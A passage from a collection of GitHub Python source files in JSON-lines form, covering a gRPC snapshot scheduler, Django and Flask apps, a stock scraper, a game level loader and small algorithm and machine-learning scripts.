AND articles.user = ?\",\n (article_id, openid),\n )\n return co.Empty()\n\n @requires_token\n @log_request\n def ChangeArticleTitle(self, request, context):\n openid = context.openid\n article_id = request.article_id\n title = request.title\n\n with self.db_fn() as db:\n db.execute(\n \"UPDATE articles SET title = ? WHERE articles.id = ? AND articles.user = ?\",\n (title, article_id, openid),\n )\n return co.Empty()\n\n @requires_token\n @log_request\n def RemoveSnapshotFromArticle(self, request, context):\n article_id = request.article_id\n snapshot_id = request.snapshot_id\n\n with self.db_fn() as db:\n db.execute(\n \"DELETE FROM snapshots WHERE snapshots.uuid = ? AND snapshots.article = ?\",\n (snapshot_id, article_id),\n )\n return co.Empty()\n\n @requires_token\n @log_request\n def GetArticleSnapshots(self, request, context):\n openid = context.openid\n article_id = request.article_id\n\n snapshots = []\n with self.db_fn() as db:\n for r in db.execute(\n \"SELECT uuid, url, timestamp FROM snapshots, articles WHERE snapshots.article = ?1 AND articles.id = ?1 AND articles.user = ?2\",\n (article_id, openid),\n ):\n snapshots.append(\n co.Snapshot(\n id=r[\"uuid\"],\n url=r[\"url\"],\n timestamp=r[\"timestamp\"],\n )\n )\n return sc.GetArticleSnapshotsResponse(snapshots=snapshots)\n\n def _add_notification(self, openid, msg, is_error):\n with self.db_fn() as db:\n params = {\n 'id': uuid(),\n 'user': openid,\n 'type': 1 if is_error else 0,\n 'created_at': unix_time(),\n 'has_read': 0,\n 'content': msg,\n }\n db.execute('INSERT INTO notifications VALUES ($id, $user, $type, $created_at, $has_read, $content)', params)\n\n @requires_token\n @log_request\n def Capture(self, request, context):\n openid = context.openid\n urls = list(set(request.urls))\n article_id = request.article_id\n\n worker = self.worker_stub()\n tasks = {} # url -> task_id\n with self.db_fn() as db:\n for url in urls:\n task_id = uuid()\n tasks[url] = task_id\n db.execute(\n \"INSERT INTO tasks VALUES (?,?,?,?)\",\n (task_id, openid, url, article_id),\n )\n\n def _async_action():\n successful_urls = set()\n for res in worker.Crawl(wo.CrawlRequest(urls=urls)):\n url = res.url\n task_id = tasks[url]\n content = res.content\n logging.info(f'Capture succeeded for {url} of type {content.type}')\n timestamp = unix_time()\n _id = uuid()\n ledger_key = ledger.add(content.hash)\n with self.db_fn() as db:\n # If the snapshot already exists(because this snapshot has multiple pieces of data attached), ignore.\n db.execute(\n \"INSERT OR IGNORE INTO snapshots VALUES (?,?,?,?,?,?)\",\n (_id, article_id, url, timestamp, False, None),\n )\n db.execute(\n \"INSERT INTO data VALUES (?,?,?,?,?)\",\n (_id, content.type, content.data.decode(), content.hash, ledger_key),\n )\n db.execute('DELETE FROM tasks WHERE id = ?', (task_id,))\n successful_urls.add(url)\n self.task_event.notify()\n # Worker hang up\n for url, task_id in tasks.items():\n if url not in successful_urls:\n logging.info(f'Capture failed for {url}')\n self._add_notification(openid, f\"拍摄快照失败:{url}\", is_error=True)\n with self.db_fn() as db:\n db.execute('DELETE FROM tasks WHERE id = ?', (task_id,))\n self.task_event.notify()\n\n threading.Thread(target=_async_action).start()\n self.task_event.notify()\n return co.Empty()\n\n def _get_current_tasks(self, openid):\n tasks = []\n with self.db_fn() as db:\n for r in db.execute(\n \"SELECT id, url, article_id FROM tasks WHERE user = ?\",\n (openid,),\n ):\n task = co.Task(\n id=r[\"id\"],\n url=r[\"url\"],\n 
article_id=r[\"article_id\"],\n )\n tasks.append(task)\n return sc.CurrentTasks(tasks=tasks)\n\n @requires_token\n @log_request\n def GetActiveTasks(self, request, context):\n openid = context.openid\n yield self._get_current_tasks(openid)\n sem = self.task_event.register()\n # Stream task list continuously, but disconnect if nothing changes for 5 minutes\n while sem.acquire(timeout=300):\n yield self._get_current_tasks(openid)\n self.task_event.unregister(sem)\n\n @requires_token\n @log_request\n def ClearTasks(self, req, ctx):\n with self.db_fn() as db:\n db.execute('DELETE FROM tasks WHERE user = ?', (ctx.openid,))\n return co.Empty()\n\n @requires_token\n @log_request\n def MarkAllAsRead(self, req, ctx):\n with self.db_fn() as db:\n db.execute('UPDATE notifications SET has_read = 1 WHERE user = ?', (ctx.openid,))\n return co.Empty()\n\n @log_request\n def GetSnapshot(self, request, context):\n snapshot_id = request.id\n\n # Check if snapshot is reported\n with self.db_fn() as db:\n r = db.execute('SELECT reported, report_reason FROM snapshots WHERE uuid = ?', (snapshot_id,)).fetchone()\n if r['reported'] > 0:\n context.abort(StatusCode.PERMISSION_DENIED, f\"Snapshot is reported: {r['report_reason']}\")\n\n with self.db_fn() as db:\n r = db.execute(\n \"SELECT type, access_url, ledger_key, hash FROM data WHERE snapshot = ?\", (snapshot_id,)\n )\n if r is None:\n context.abort(StatusCode.NOT_FOUND, \"Snapshot not found\")\n\n contents = []\n for datum in r:\n contents.append(co.Content(type=datum['type'], data=datum['access_url'].encode(), ledger_key=datum['ledger_key'], hash=datum['hash']))\n return sc.Contents(contents=contents)\n\n @log_request\n def ListSnapshots(self, request, context):\n url = request.url\n\n snapshots = []\n with self.db_fn() as db:\n for r in db.execute(\n \"SELECT uuid, url, timestamp FROM snapshots WHERE snapshots.url = ?\",\n (url,),\n ):\n snapshots.append(\n co.Snapshot(\n id=r[\"uuid\"],\n url=r[\"url\"],\n timestamp=r[\"timestamp\"],\n )\n )\n return sc.Snapshots(snapshots=snapshots)\n\n @log_request\n def Report(self, req, ctx):\n with self.db_fn() as db:\n db.execute('UPDATE snapshots SET reported = 1, report_reason = ? 
WHERE uuid = ?', (req.reason, req.snapshot_id))\n return co.Empty()\n\n @log_request\n def RegisterWorker(self, request, context):\n addr = request.addr\n port = request.port\n self.workers.add(f\"{addr}:{port}\")\n return co.Empty()\n\n\ndef serve(port=8000):\n server = grpc.server(ThreadPoolExecutor(max_workers=10))\n my_scheduler = MyScheduler(\n db_fn=lambda: open_db(Path(\"db/production\"), Path(\"db/schema\")),\n auth=Auth(),\n task_event=Event(),\n )\n add_SchedulerServicer_to_server(my_scheduler, server)\n server.add_insecure_port(f\"0.0.0.0:{port}\")\n server.start()\n logging.info(f\"Scheduler listening at 0.0.0.0:{port}\")\n server.wait_for_termination()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n port = os.getenv(\"SCHEDULER_PORT\", 8848)\n serve(port)\n","repo_name":"YizhePKU/Time-Capsule","sub_path":"scheduler/servicer.py","file_name":"servicer.py","file_ext":"py","file_size_in_byte":13658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5216195956","text":"from django.shortcuts import render\n\n# Create your views here.\nAPP_NAME = 'meditation'\nAPP_FULL_NAME = 'Breathing Meditation'\nICON_FILENAME = 'crucifix.svg'\n\ndef home(request):\n\n context = {\n 'app_full_name': APP_FULL_NAME,\n 'icon_filename': ICON_FILENAME\n }\n\n return render(request, 'meditation/home.html', context)\n","repo_name":"delperdang/lexcredendi","sub_path":"meditation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13923898189","text":"from custom_modules import messages as m\nfrom custom_modules import stock_data as s\nfrom custom_modules import finviz as f\nfrom custom_modules import more_stock_data as z\nfrom custom_modules import investors_hub as ih\nclass Scraper:\n def symbol_getter(self):\n self.symbol = input(\"Enter stock symbol: \")\n\n def scrape_yahoo(self):\n yahoo = s.YahooFinance(self.symbol)\n yahoo.build_url()\n yahoo.parser()\n yahoo.pull_table_data()\n\n\n def scrape_stock_twits(self):\n user = m.StockTwits(self.symbol)\n user.open_parser()\n user.find_element()\n user.display()\n\n def scrape_finviz(self):\n fin = f.FinViz(self.symbol)\n fin.build_url()\n fin.parser()\n fin.pull_table_data()\n\n def more_yahoo_finance(self):\n more = z.MoreYahooFinance(self.symbol)\n more.build_url()\n more.parser()\n more.pull_table_data()\n\n def investors_hub(self):\n stocks = ih.InvestorsHub()\n stocks.pull()\n stocks.filter_results()\n self.potential_stocks = stocks.results()\n print(self.potential_stocks)\n\n\n\nscraper = Scraper()\nscraper.investors_hub()\nprint(\" \", '\\n')\nscraper.symbol_getter()\nprint(\" \")\nscraper.scrape_yahoo()\nprint(\" \")\nscraper.more_yahoo_finance()\nprint(\" \")\nscraper.scrape_stock_twits()\nprint(\" \")\nscraper.scrape_finviz()\n","repo_name":"VLadio11/stock-scraper","sub_path":"general/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8229394148","text":"\r\n\"\"\" loading in of the level map\r\n\r\nsetup_world() : called in level_data\r\n putting all the levels into one list\r\n\r\nsetup_level() : called in level_data\r\n reads a level out of a file and puts them in a list\r\n\"\"\"\r\n\r\nlevel_map = []\r\n\r\ndef setup_world(l1,l2,l3,l4,l5,l6,l7,l8,l9,l0,l10):\r\n global level_map\r\n i = 0\r\n 
on = True\r\n    one = False\r\n    two = False\r\n    while on:\r\n        if one == False and two == False:\r\n            level_top = l1[i] + l2[i] + l3[i]\r\n            level_map.append(level_top)\r\n            i += 1\r\n            if i == 32:\r\n                i = 0\r\n                one = True\r\n        elif one == True and two == False:\r\n            level_mid = l4[i] + l5[i] + l6[i]\r\n            level_map.append(level_mid)\r\n            i += 1\r\n            if i == 32:\r\n                i = 0\r\n                two = True\r\n        elif one == True and two == True:\r\n            level_bot = l7[i] + l8[i] + l9[i]\r\n            level_map.append(level_bot)\r\n            i += 1\r\n            if i == 32:\r\n                i = 0\r\n                one = False\r\n        elif one == False and two == True:\r\n            level_bot2 = l0[i] + l0[i] + l10[i]\r\n            level_map.append(level_bot2)\r\n            i += 1\r\n            if i == 32:\r\n                on = False\r\n\r\ndef setup_level(level_name):\r\n    level_file = open(\"../editor/\" + level_name + \".map\",\"r\")\r\n    level = level_file.readlines()\r\n    level_file.close()\r\n    for i in range(0,32):\r\n        level[i] = level[i].replace(\"\\n\", \"\")\r\n    return level\r\n\r\nlevel_1 = setup_level(\"l1\")\r\nlevel_2 = setup_level(\"l2\")\r\nlevel_3 = setup_level(\"l3\")\r\nlevel_4 = setup_level(\"l6\")\r\nlevel_5 = setup_level(\"l5\")\r\nlevel_6 = setup_level(\"l4\")\r\nlevel_7 = setup_level(\"l7\")\r\nlevel_8 = setup_level(\"l8\")\r\nlevel_9 = setup_level(\"l9\")\r\nlevel_0 = setup_level(\"l0\")\r\nlevel_10 = setup_level(\"l10\")\r\n\r\nsetup_world(\r\n    level_1,level_2,level_3,\r\n    level_4,level_5,level_6,\r\n    level_7,level_8,level_9,\r\n    level_0,level_10)","repo_name":"Uncrit/Eras-Adventure","sub_path":"code/level_data.py","file_name":"level_data.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"26379886790","text":"import checkpointLogic as cpl\n\n# checkpt lives in the checkpointLogic module, so it must be qualified with the cpl alias\ncpl.cp0 = cpl.checkpt(0, 4, 17)\ncpl.cp1 = cpl.checkpt(1, 5, 6)\ncpl.cp2 = cpl.checkpt(2, 23, 24)\ncpl.cp3 = cpl.checkpt(3, 16, 20)\n\ncpl.cp0.assignPins()\ncpl.cp1.assignPins()\ncpl.cp2.assignPins()\ncpl.cp3.assignPins()\n\n\ni=0\nwhile(True):\n    if cpl.checkpointReached(i % 4):\n        print(i%4)\n        i += 1","repo_name":"eidexe96/ITSRacetrack","sub_path":"DuplicatesAndTests/cpTest.py","file_name":"cpTest.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6760995773","text":"from sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import explained_variance_score, r2_score, mean_squared_error\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\n\n\ndef gbt_algorythm(X_train, y_train, X_test, y_test):\n\n    model = GradientBoostingClassifier(n_estimators=20, random_state=42, learning_rate=0.1, max_depth=4)\n    model.fit(X_train, y_train)\n\n    y_pred = model.predict(X_test)\n\n    variance_score = explained_variance_score(y_test, y_pred)\n    print(\"Explained variance score Gradient boosted tree: %.2f%%\" % (variance_score * 100.0))\n\n    r2 = r2_score(y_test, y_pred)\n    print(\"R^2 score Gradient boosted tree: %.2f\" % r2)\n\n    mean = mean_squared_error(y_test, y_pred)\n    rmse = np.sqrt(mean)\n    print(\"Root mean square error Gradient boosted tree: %.2f\" % rmse)\n\n    print(\"Classification Report\")\n    print(classification_report(y_test, y_pred))\n\n","repo_name":"jvukasin/SIAP","sub_path":"gradient_boosted_tree_alg.py","file_name":"gradient_boosted_tree_alg.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"12543554371","text":"#!/usr/bin/env python3\n\nimport 
json\nimport argparse\nfrom typing import List, Dict, Tuple\nfrom lib import SvgStyle, SvgWriter, Polygon2D\n\n\nSVG_STYLE_VEC_BEFORE: Dict[str, str] = {\n    \"fill-opacity\": \"1.0\",\n    \"fill\": \"#7f007f\", # Purple\n    \"stroke\": \"none\",\n}\nSVG_STYLE_POLY_BEFORE: Dict[str, str] = {\n    \"fill-opacity\": \"0.0\",\n    \"stroke\": \"#7f007f\", # Purple\n    \"stroke-width\": \"0.25\",\n}\nSVG_STYLE_VEC_AFTER: Dict[str, str] = {\n    \"fill-opacity\": \"1.0\",\n    \"fill\": \"#007f7f\", # Teal\n    \"stroke\": \"none\",\n}\nSVG_STYLE_POLY_AFTER: Dict[str, str] = {\n    \"fill-opacity\": \"0.0\",\n    \"stroke\": \"#007f7f\", # Teal\n    \"stroke-width\": \"0.25\",\n}\n\n\ndef add_center_polygon_parser(subparsers: argparse._SubParsersAction) -> None:\n    parser = subparsers.add_parser(\n        \"center-polygon\",\n        help=\"Given a polygon as a set of vertices, center it around the origin (0,0)\",\n    )\n    parser.add_argument(\"input_path\")\n    parser.add_argument(\"output_path\")\n    parser.add_argument(\"--debug-svg\", type=str, default=\"\")\n    parser.set_defaults(func=center_polygon)\n\n\ndef center_polygon(args: argparse.Namespace) -> int:\n    json_data: List[Tuple[float, float]] = []\n    with open(args.input_path, \"r\") as f:\n        json_data = json.loads(f.read())\n\n    original_poly = Polygon2D.from_json(json_data)\n    centered_poly = original_poly.centered()\n\n    svg_writer = SvgWriter()\n    svg_writer.append_element(original_poly, SvgStyle(SVG_STYLE_POLY_BEFORE))\n    for v in original_poly.vertices:\n        svg_writer.append_element(v, SvgStyle(SVG_STYLE_VEC_BEFORE))\n    svg_writer.append_element(centered_poly, SvgStyle(SVG_STYLE_POLY_AFTER))\n    for v in centered_poly.vertices:\n        svg_writer.append_element(v, SvgStyle(SVG_STYLE_VEC_AFTER))\n    if args.debug_svg != \"\":\n        print('Writing debug svg to \"{}\"'.format(args.debug_svg))\n        svg_writer.write_to_file(args.debug_svg)\n    else:\n        svg_writer.write_to_stdout()\n\n    with open(args.output_path, \"w\") as f:\n        f.write(json.dumps(centered_poly.to_json(), indent=4))\n\n    return 0\n","repo_name":"cozykeys/resources","sub_path":"concepts/triad/scripts/commands/center_polygon.py","file_name":"center_polygon.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"8206139092","text":"def minNumOfRooms(lectureTimes):\r\n    if not lectureTimes:\r\n        return 0\r\n\r\n    # create dictionaries for start and end times\r\n    startTimes = dict()\r\n    endTimes = dict()\r\n\r\n    # single pass that adds start times to the startTimes dictionary\r\n    # and end times to the endTimes dictionary\r\n    for start, end in lectureTimes:\r\n        if start not in startTimes:\r\n            startTimes[start] = 0\r\n        startTimes[start] += 1\r\n\r\n        if end not in endTimes:\r\n            endTimes[end] = 0\r\n        endTimes[end] += 1\r\n\r\n    # find the global start and end times\r\n    globalStart, globalEnd = min(startTimes), max(endTimes)\r\n\r\n    maxClassCount = 0\r\n    currClassCount = 0\r\n\r\n    for i in range(globalStart, globalEnd):\r\n        # if i is a start time,\r\n        # add its start count to the current class count\r\n        if i in startTimes:\r\n            currClassCount += startTimes[i]\r\n            # and if the current class count is greater than the max class count,\r\n            # set max equal to current\r\n            if currClassCount > maxClassCount:\r\n                maxClassCount = currClassCount\r\n\r\n        # if i is an end time,\r\n        # subtract its end count from the current class count\r\n        if i in endTimes:\r\n            currClassCount -= endTimes[i]\r\n\r\n    return maxClassCount\r\n\r\n\r\n\r\n\r\nlectureTimes = [[30, 75], [0, 50], [60, 150]]\r\n\r\nprint(\"Number of 
rooms you'll need is\", minNumOfRooms(lectureTimes))\r\n","repo_name":"cgrant093/DCP","sub_path":"Days 21-30/20190609/DCP20190609.py","file_name":"DCP20190609.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29902231813","text":"import unittest\nfrom patterns.behavioral.chain_resposibility import Container, Leaf\n\n\nclass ChainOfResponsibility(unittest.TestCase):\n def test_should_handler_be_called_when_handle_is_called(self):\n was_called = False\n\n def testHandler():\n nonlocal was_called\n was_called = True\n child = Leaf(testHandler)\n child.handle()\n self.assertTrue(was_called)\n\n def test_should_call_parent_handler_when_no_handle_is_set_but_called(self):\n was_called = False\n\n def testHandler():\n nonlocal was_called\n was_called = True\n child = Leaf(None)\n parent = Container(testHandler)\n parent.add(child)\n child.handle()\n self.assertTrue(was_called)\n\n def test_should_call_the_higher_parent_handler_method_when_none_is_set(\n self):\n was_called = False\n\n def testHandler():\n nonlocal was_called\n was_called = True\n child = Leaf(None)\n lower_parent = Container(None)\n higher_parent = Container(testHandler)\n higher_parent.add(lower_parent)\n lower_parent.add(child)\n child.handle()\n self.assertTrue(was_called)\n","repo_name":"cruzortiz99/design-patterns","sub_path":"design-pattern-python/test/patterns/behavioral/chain_resposibility_test/__init__test.py","file_name":"__init__test.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19091331699","text":"# -*- coding: utf-8 -*-\n\n\nimport os\nimport math\nfrom PyQt5 import QtWidgets, QtCore, uic\nfrom pypipboy.types import eValueType\nfrom .. 
import widgets\nfrom pypipboy import inventoryutils\n\n\npowerArmorPaperDollSlots = [\n 'Body', # 0\n 'leftleg', # 1\n 'rightleg', # 2\n 'leftarm', # 3\n 'rightarm', # 4\n 'torso', # 5\n 'head', # 6\n 'head',#7\n 'head'#8\n ]\nclass PowerArmorInfoWidget(widgets.WidgetBase):\n _signalInfoUpdated = QtCore.pyqtSignal()\n \n def __init__(self, handle, controller, parent):\n super().__init__('Power Armor Info', parent)\n self.controller = controller\n self.widget = uic.loadUi(os.path.join(handle.basepath, 'ui', 'powerarmorinfowidget.ui'))\n self.setWidget(self.widget)\n self.pipPlayerInfo = None\n self._signalInfoUpdated.connect(self._slotInfoUpdated)\n self.paHP = {}\n for item in powerArmorPaperDollSlots:\n self.paHP[item + 'Max'] = 0\n\n\n\n def init(self, app, datamanager):\n super().init(app, datamanager)\n self.dataManager = datamanager\n self.dataManager.registerRootObjectListener(self._onPipRootObjectEvent)\n \n def _onPipRootObjectEvent(self, rootObject):\n self.pipInventoryInfo = rootObject.child('Inventory')\n if self.pipInventoryInfo:\n self.pipInventoryInfo.registerValueUpdatedListener(self._onPipInventoryInfoUpdate, 1)\n self._signalInfoUpdated.emit()\n\n\n def _onPipInventoryInfoUpdate(self, caller, value, pathObjs):\n self._signalInfoUpdated.emit()\n \n @QtCore.pyqtSlot()\n def _slotInfoUpdated(self):\n self.getPowerArmorItems()\n\n\n\n def getPowerArmorItems(self):\n equipedPA = []\n for item in powerArmorPaperDollSlots:\n self.paHP[item + 'Cur'] = 0\n\n if (self.pipInventoryInfo):\n def _filterFunc(item):\n return inventoryutils.itemHasAnyFilterCategory(item, inventoryutils.eItemFilterCategory.Apparel)\n\n power_armor = inventoryutils.inventoryGetItems(self.pipInventoryInfo, _filterFunc)\n for item in power_armor:\n\n if (item.child('isPowerArmorItem').value() and (item.child('equipState').value() == 1)):\n itemHealthTxt = inventoryutils.itemFindItemCardInfoValue(item, '$health')\n itemHealth = itemHealthTxt.split('/')\n itemTxt = item.child('text').value()\n\n i = 0\n paperDollLoc = None\n for section in item.child('PaperdollSection').value():\n if section.value():\n self.paHP[powerArmorPaperDollSlots[i] + 'Cur'] = int(itemHealth[0])\n self.paHP[powerArmorPaperDollSlots[i] + 'Max'] = int(itemHealth[1])\n maxHP = self.paHP[powerArmorPaperDollSlots[i] + 'Max']\n curHP = self.paHP[powerArmorPaperDollSlots[i] + 'Cur']\n percentHP = (curHP*100/maxHP)\n if itemTxt:\n self.widget.headItemLabel.setText(itemTxt)\n self.setWidgetValues(powerArmorPaperDollSlots[i],percentHP, itemHealthTxt,itemTxt)\n equipedPA.append(powerArmorPaperDollSlots[i])\n i+=1\n for item in powerArmorPaperDollSlots:\n if (not item in equipedPA and (not item == 'Body')):\n self.setWidgetValues(item,0, 'Empty',' ')\n\n def setWidgetValues(self, subwidget,value,text,itemName):\n methodToCall = getattr(self.widget,subwidget + 'Bar')\n methodToCall.setValue(value)\n methodToCall = getattr(self.widget,subwidget + 'Label')\n methodToCall.setText(text)\n methodToCall = getattr(self.widget,subwidget + 'ItemLabel')\n methodToCall.setText(itemName)\n\n\n","repo_name":"gwhittey23/powerarmorinfowidget","sub_path":"powerarmorinfowidget.py","file_name":"powerarmorinfowidget.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74686490348","text":"def len(arr,n):\n\tm=1\n\tl=1\n\tfor i in range(1,n):\n\t\tif arr[i] > arr[i-1]:\n\t\t\tl=l+1\n\t\telse:\n\t\t\tif m 0):\n n_cases -= 1\n burles = input().split(\" \")\n assert 
len(burles) == 2, \"Invalid input\"\n burles = [int(x) for x in burles]\n print(solve(burles[0], burles[1]))\n","repo_name":"discounter24/codeforces","sub_path":"1660A.py","file_name":"1660A.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33565490018","text":"from flask import Flask, render_template, request\nfrom flask_restful import Api\nfrom flask_googlemaps import GoogleMaps, Map\nfrom clips import Symbol, Environment\nfrom api.model.response import Success, Error\nfrom api.settings import GOOGLE_MAPS_TOKEN\nimport json\n\nenv = Environment()\n\nenv.load(\"expert_system.clp\")\nenv.reset()\n\nSERVICE_TEMPLATE = env.find_template('Service')\nEMERGENCY_TEMPLATE = env.find_template('Emergency')\n\nservice_count = 0\nemergency_count = 0\n\napp = Flask(\"CLIPS Map\", template_folder=\"templates\", static_folder=\"static\")\napi = Api(app)\nGoogleMaps(app, key=str(GOOGLE_MAPS_TOKEN))\n\nmy_map = Map(identifier=\"view-side\", lat=-15.42843, lng=28.12504)\n\n\n@app.route(\"/\")\ndef display_map():\n global service_count\n global emergency_count\n service_count = 0\n emergency_count = 0\n\n facts = []\n for i, fact in enumerate(env.facts()):\n if fact.template.name == 'Service' or fact.template.name == 'Emergency':\n facts.append(fact)\n for fact in facts:\n fact.retract()\n env.run()\n\n return render_template('index.html', mymap=my_map)\n\n\n@app.route(\"/addService\", methods=['POST'])\ndef add_service():\n global service_count\n service = SERVICE_TEMPLATE.new_fact()\n service[\"id\"] = service_count\n service[\"name\"] = Symbol(request.form.get(\"servicename\"))\n service[\"location\"] = [float(request.form.get(\"locx\")), float(request.form.get(\"locy\"))]\n service[\"n_members\"] = int(request.form.get(\"members\"))\n service[\"movement_speed\"] = float(request.form.get(\"speed\"))\n service[\"prep_time\"] = float(request.form.get(\"preptime\"))\n service.assertit()\n\n if service.asserted:\n service_count += 1\n env.run()\n data = {\"id\": service['id'], \"name\": service['name']}\n logs = get_current_responses()\n response = Success(callback=data, logs=logs, message=\"Emergency added successfully\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Service could not be added. Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\n@app.route(\"/addEmergency\", methods=['POST'])\ndef add_emergency():\n global emergency_count\n emergency = EMERGENCY_TEMPLATE.new_fact()\n emergency[\"id\"] = emergency_count\n emergency[\"type\"] = Symbol(request.form.get(\"emergencytype\"))\n emergency[\"location\"] = [float(request.form.get(\"locx\")), float(request.form.get(\"locy\"))]\n emergency[\"n_affected_people\"] = int(request.form.get(\"affected\"))\n emergency.assertit()\n\n if emergency.asserted:\n emergency_count += 1\n env.run()\n data = {\"id\": emergency['id'], \"type\": emergency['type']}\n logs = get_current_responses()\n response = Success(callback=data, logs=logs, message=\"Emergency added successfully\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Emergency could not be added. 
Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\n@app.route(\"/moveService\", methods=['POST'])\ndef move_service():\n fact_id = request.form.get(\"id\")\n loc_x = request.form.get(\"locx\")\n loc_y = request.form.get(\"locy\")\n\n for fact in env.facts():\n if fact.template.name == 'Service' and fact['id'] == int(fact_id):\n service = SERVICE_TEMPLATE.new_fact()\n service[\"id\"] = int(fact_id)\n service[\"name\"] = fact['name']\n service[\"location\"] = [float(loc_x), float(loc_y)]\n service[\"n_members\"] = int(fact['n_members'])\n service[\"movement_speed\"] = float(fact['movement_speed'])\n service[\"prep_time\"] = float(fact['prep_time'])\n\n service.assertit()\n\n fact.retract()\n\n if service.asserted:\n env.run()\n response = Success(None, None, \"Service re-allocated successfully!\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Service could not be re-allocated. Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\n@app.route(\"/moveEmergency\", methods=['POST'])\ndef move_emergency():\n fact_id = request.form.get(\"id\")\n loc_x = request.form.get(\"locx\")\n loc_y = request.form.get(\"locy\")\n\n for fact in env.facts():\n if fact.template.name == 'Emergency' and fact['id'] == int(fact_id):\n emergency = EMERGENCY_TEMPLATE.new_fact()\n emergency[\"id\"] = int(fact_id)\n emergency[\"type\"] = fact['type']\n emergency[\"location\"] = [float(loc_x), float(loc_y)]\n emergency[\"n_affected_people\"] = int(fact['n_affected_people'])\n\n emergency.assertit()\n\n fact.retract()\n\n if emergency.asserted:\n env.run()\n response = Success(None, None, \"Emergency re-allocated successfully!\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n response = Error(None, None, \"Emergency could not be re-allocated. 
Try again later.\")\n json_data = json.dumps(response.__dict__, default=lambda o: o.__dict__, indent=4)\n return json_data\n\n\ndef get_current_responses():\n responses = []\n emergencies = []\n facts = []\n for i, fact in enumerate(env.facts()):\n print(fact)\n if fact.template.name == 'Solution':\n fact_data = dict()\n fact_data['code'] = fact['code_error']\n fact_data['id_emergency'] = fact['id_emergency']\n fact_data['id_service'] = fact['id_service']\n fact_data['service'] = fact['name_service']\n fact_data['emergency'] = fact['name_emergency']\n responses.append(fact_data)\n facts.append(fact)\n if fact['code_error'] >= 0:\n for j, e_fact in enumerate(env.facts()):\n if e_fact.template.name == 'Emergency' and e_fact['id'] == fact['id_emergency']:\n emergencies.append(e_fact)\n\n for fact in facts:\n fact.retract()\n for emergency in emergencies:\n emergency.retract()\n env.run()\n\n return responses\n\n\ndef is_error_response(response):\n return response['code'] < 0\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"darkhorrow/emergency-services-app","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43522234584","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n is_active = db.Column(db.Boolean(), unique=False, nullable=False)\n\n def __repr__(self):\n return '' % self.username\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"email\": self.email,\n # do not serialize the password, its a security breach\n }\n\nContact_Group_link = db.Table(\"links\",\n db.Column(\"id_contact\", db.Integer, db.ForeignKey(\"Contact.id\"), primary_key=True),\n db.Column(\"id_group\", db.Integer, db.ForeignKey(\"Group.id\"), primary_key=True)\n)\n\nclass Contact(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n full_name = db.Column(db.String(80), nullable=False)\n email = db.Column(db.String(80), nullable=False)\n address = db.Column(db.String(80))\n phone = db.Column(db.String(80))\n\n \n\n\n\n\n\nclass Group(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n contacts = db.relationship(\"Contact\", secondary=\"links\", lazy='subquery', backref = db.backref(\"groups\", lazy=True))\n","repo_name":"OmarElFakih/flask-contact-list-api","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"516034440","text":"from django.db.models import Q\nfrom django_filters import rest_framework as filters\n\nfrom accounts.models import InstructorProfile, StudentProfile\nfrom education.models import (\n Assignment,\n Course,\n Event,\n EventType,\n Grade,\n NonPeriodicEventDetails,\n PeriodicEventDetails,\n Solution,\n StudentGroup,\n Timetable,\n)\n\n\nclass CourseFilter(filters.FilterSet):\n instructors = 